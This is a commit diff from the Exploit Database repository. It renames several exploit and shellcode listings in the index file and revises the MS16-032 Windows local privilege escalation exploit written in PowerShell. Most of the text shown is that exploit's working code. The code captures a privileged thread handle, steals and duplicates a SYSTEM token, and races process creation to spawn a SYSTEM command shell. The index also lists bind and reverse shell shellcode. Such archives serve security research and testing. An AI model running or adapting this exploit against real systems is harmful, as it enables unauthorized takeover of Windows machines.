DB: 2016-07-13
This commit is contained in:
Offensive Security
parent
fc4bc08825
commit
5cf8f533ae
2 changed files with 76 additions and 78 deletions
10
files.csv
10
files.csv
|
|
@ -2868,7 +2868,7 @@ id,file,description,date,author,platform,type,port
|
|||
3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0
|
||||
3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
|
||||
3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0
|
||||
3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)",2007-01-25,MoAB,osx,dos,0
|
||||
3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)",2007-01-25,MoAB,osx,dos,0
|
||||
3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0
|
||||
3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0
|
||||
3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0
|
||||
|
|
@ -11735,7 +11735,7 @@ id,file,description,date,author,platform,type,port
|
|||
40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0
|
||||
40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
|
||||
40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
|
||||
40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)",2016-07-11,"Mehmet Ince",php,remote,80
|
||||
40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
|
||||
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
|
||||
13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
|
||||
13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
|
||||
|
|
@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
|
|||
36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
|
||||
36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
|
||||
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
|
||||
36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
|
||||
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
|
||||
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
|
||||
|
|
@ -35918,7 +35918,7 @@ id,file,description,date,author,platform,type,port
|
|||
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
|
||||
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
|
||||
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
|
||||
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
|
||||
|
|
@ -36003,7 +36003,7 @@ id,file,description,date,author,platform,type,port
|
|||
39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
|
||||
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
|
||||
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
|
||||
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
|
||||
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
|
||||
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -15,17 +15,15 @@ function Invoke-MS16-032 {
|
|||
|
||||
* In order for the race condition to succeed the machine must have 2+ CPU
|
||||
cores. If testing in a VM just make sure to add a core if needed mkay.
|
||||
* The exploit is pretty reliable, however ~1/6 times it will say it succeeded
|
||||
but not spawn a shell. Not sure what the issue is but just re-run and profit!
|
||||
* Want to know more about MS16-032 ==>
|
||||
https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
|
||||
|
||||
.DESCRIPTION
|
||||
Author: Ruben Boonen (@FuzzySec)
|
||||
Blog: http://www.fuzzysecurity.com/
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: PowerShell v2+
|
||||
Optional Dependencies: None
|
||||
E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736
|
||||
|
||||
.EXAMPLE
|
||||
C:\PS> Invoke-MS16-032
|
||||
|
|
@ -209,20 +207,19 @@ function Invoke-MS16-032 {
|
|||
}
|
||||
|
||||
function Get-SystemToken {
|
||||
echo "`n[?] Trying thread handle: $Thread"
|
||||
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
|
||||
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
|
||||
|
||||
$CallResult = [Kernel32]::SuspendThread($Thread)
|
||||
$CallResult = [Kernel32]::SuspendThread($hThread)
|
||||
if ($CallResult -ne 0) {
|
||||
echo "[!] $Thread is a bad thread, moving on.."
|
||||
echo "[!] $hThread is a bad thread, exiting.."
|
||||
Return
|
||||
} echo "[+] Thread suspended"
|
||||
|
||||
echo "[>] Wiping current impersonation token"
|
||||
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
|
||||
$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
|
||||
if (!$CallResult) {
|
||||
echo "[!] SetThreadToken failed, moving on.."
|
||||
$CallResult = [Kernel32]::ResumeThread($Thread)
|
||||
echo "[!] SetThreadToken failed, exiting.."
|
||||
$CallResult = [Kernel32]::ResumeThread($hThread)
|
||||
echo "[+] Thread resumed!"
|
||||
Return
|
||||
}
|
||||
|
|
@ -233,27 +230,29 @@ function Invoke-MS16-032 {
|
|||
$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
|
||||
$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
|
||||
# Undocumented API's, I like your style Microsoft ;)
|
||||
$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
|
||||
$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
|
||||
if ($CallResult -ne 0) {
|
||||
echo "[!] NtImpersonateThread failed, moving on.."
|
||||
$CallResult = [Kernel32]::ResumeThread($Thread)
|
||||
echo "[!] NtImpersonateThread failed, exiting.."
|
||||
$CallResult = [Kernel32]::ResumeThread($hThread)
|
||||
echo "[+] Thread resumed!"
|
||||
Return
|
||||
}
|
||||
|
||||
|
||||
# Null $SysTokenHandle
|
||||
$script:SysTokenHandle = [IntPtr]::Zero
|
||||
|
||||
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
|
||||
$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
|
||||
$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
|
||||
if (!$CallResult) {
|
||||
echo "[!] OpenThreadToken failed, moving on.."
|
||||
$CallResult = [Kernel32]::ResumeThread($Thread)
|
||||
echo "[!] OpenThreadToken failed, exiting.."
|
||||
$CallResult = [Kernel32]::ResumeThread($hThread)
|
||||
echo "[+] Thread resumed!"
|
||||
Return
|
||||
}
|
||||
|
||||
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
|
||||
echo "[+] Resuming thread.."
|
||||
$CallResult = [Kernel32]::ResumeThread($Thread)
|
||||
$CallResult = [Kernel32]::ResumeThread($hThread)
|
||||
}
|
||||
|
||||
# main() <--- ;)
|
||||
|
|
@ -275,62 +274,49 @@ function Invoke-MS16-032 {
|
|||
Return
|
||||
}
|
||||
|
||||
# Create array for Threads & TID's
|
||||
$ThreadArray = @()
|
||||
$TidArray = @()
|
||||
echo "[>] Duplicating CreateProcessWithLogonW handle"
|
||||
$hThread = Get-ThreadHandle
|
||||
|
||||
echo "[>] Duplicating CreateProcessWithLogonW handles.."
|
||||
# Loop Get-ThreadHandle and collect thread handles with a valid TID
|
||||
for ($i=0; $i -lt 500; $i++) {
|
||||
$hThread = Get-ThreadHandle
|
||||
$hThreadID = [Kernel32]::GetThreadId($hThread)
|
||||
# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
|
||||
if ($TidArray -notcontains $hThreadID) {
|
||||
$TidArray += $hThreadID
|
||||
if ($hThread -ne 0) {
|
||||
$ThreadArray += $hThread # This is what we need!
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if ($($ThreadArray.length) -eq 0) {
|
||||
echo "[!] No valid thread handles were captured, exiting!"
|
||||
# If no thread handle is captured, the box is patched
|
||||
if (!$hThread) {
|
||||
echo "[!] No valid thread handles were captured, exiting!`n"
|
||||
Return
|
||||
} else {
|
||||
echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
|
||||
echo "`n[?] Thread handle list:"
|
||||
$ThreadArray
|
||||
echo "[?] Done, using thread handle: $hThread"
|
||||
} echo "`n[*] Sniffing out privileged impersonation token.."
|
||||
|
||||
# Get handle to SYSTEM access token
|
||||
Get-SystemToken
|
||||
|
||||
# If we fail a check in Get-SystemToken, skip loop
|
||||
if ($SysTokenHandle -eq 0) {
|
||||
Return
|
||||
}
|
||||
|
||||
echo "`n[*] Sniffing out privileged impersonation token.."
|
||||
foreach ($Thread in $ThreadArray){
|
||||
echo "`n[*] Sniffing out SYSTEM shell.."
|
||||
echo "`n[>] Duplicating SYSTEM token"
|
||||
$hDuplicateTokenHandle = [IntPtr]::Zero
|
||||
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
|
||||
|
||||
# Get handle to SYSTEM access token
|
||||
Get-SystemToken
|
||||
|
||||
echo "`n[*] Sniffing out SYSTEM shell.."
|
||||
echo "`n[>] Duplicating SYSTEM token"
|
||||
$hDuplicateTokenHandle = [IntPtr]::Zero
|
||||
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
|
||||
|
||||
# Simple PS runspace definition
|
||||
echo "[>] Starting token race"
|
||||
$Runspace = [runspacefactory]::CreateRunspace()
|
||||
$StartTokenRace = [powershell]::Create()
|
||||
$StartTokenRace.runspace = $Runspace
|
||||
$Runspace.Open()
|
||||
[void]$StartTokenRace.AddScript({
|
||||
Param ($Thread, $hDuplicateTokenHandle)
|
||||
while ($true) {
|
||||
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
|
||||
}
|
||||
}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
|
||||
$AscObj = $StartTokenRace.BeginInvoke()
|
||||
|
||||
echo "[>] Starting process race"
|
||||
# Adding a timeout (10 seconds) here to safeguard from edge-cases
|
||||
$SafeGuard = [diagnostics.stopwatch]::StartNew()
|
||||
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
|
||||
# Simple PS runspace definition
|
||||
echo "[>] Starting token race"
|
||||
$Runspace = [runspacefactory]::CreateRunspace()
|
||||
$StartTokenRace = [powershell]::Create()
|
||||
$StartTokenRace.runspace = $Runspace
|
||||
$Runspace.Open()
|
||||
[void]$StartTokenRace.AddScript({
|
||||
Param ($hThread, $hDuplicateTokenHandle)
|
||||
while ($true) {
|
||||
$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
|
||||
}
|
||||
}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
|
||||
$AscObj = $StartTokenRace.BeginInvoke()
|
||||
|
||||
echo "[>] Starting process race"
|
||||
# Adding a timeout (10 seconds) here to safeguard from edge-cases
|
||||
$SafeGuard = [diagnostics.stopwatch]::StartNew()
|
||||
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
|
||||
|
||||
# StartupInfo Struct
|
||||
$StartupInfo = New-Object STARTUPINFO
|
||||
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
|
||||
|
|
@ -347,6 +333,18 @@ function Invoke-MS16-032 {
|
|||
0x00000002, "C:\Windows\System32\cmd.exe", "",
|
||||
0x00000004, $null, $GetCurrentPath,
|
||||
[ref]$StartupInfo, [ref]$ProcessInfo)
|
||||
|
||||
#---
|
||||
# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
|
||||
#---
|
||||
# Missing this check used to cause the exploit to fail sometimes.
|
||||
# If CreateProcessWithLogon fails OpenProcessToken won't succeed
|
||||
# but we obviously don't have a SYSTEM shell :'( . Should be 100%
|
||||
# reliable now!
|
||||
#---
|
||||
if (!$CallResult) {
|
||||
continue
|
||||
}
|
||||
|
||||
$hTokenHandle = [IntPtr]::Zero
|
||||
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
|
||||
|
|
@ -363,10 +361,10 @@ function Invoke-MS16-032 {
|
|||
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
|
||||
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
|
||||
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
|
||||
}
|
||||
|
||||
# Kill runspace & stopwatch if edge-case
|
||||
$StartTokenRace.Stop()
|
||||
$SafeGuard.Stop()
|
||||
|
||||
}
|
||||
|
||||
# Kill runspace & stopwatch if edge-case
|
||||
$StartTokenRace.Stop()
|
||||
$SafeGuard.Stop()
|
||||
}
|
||||
Loading…
Add table
Reference in a new issue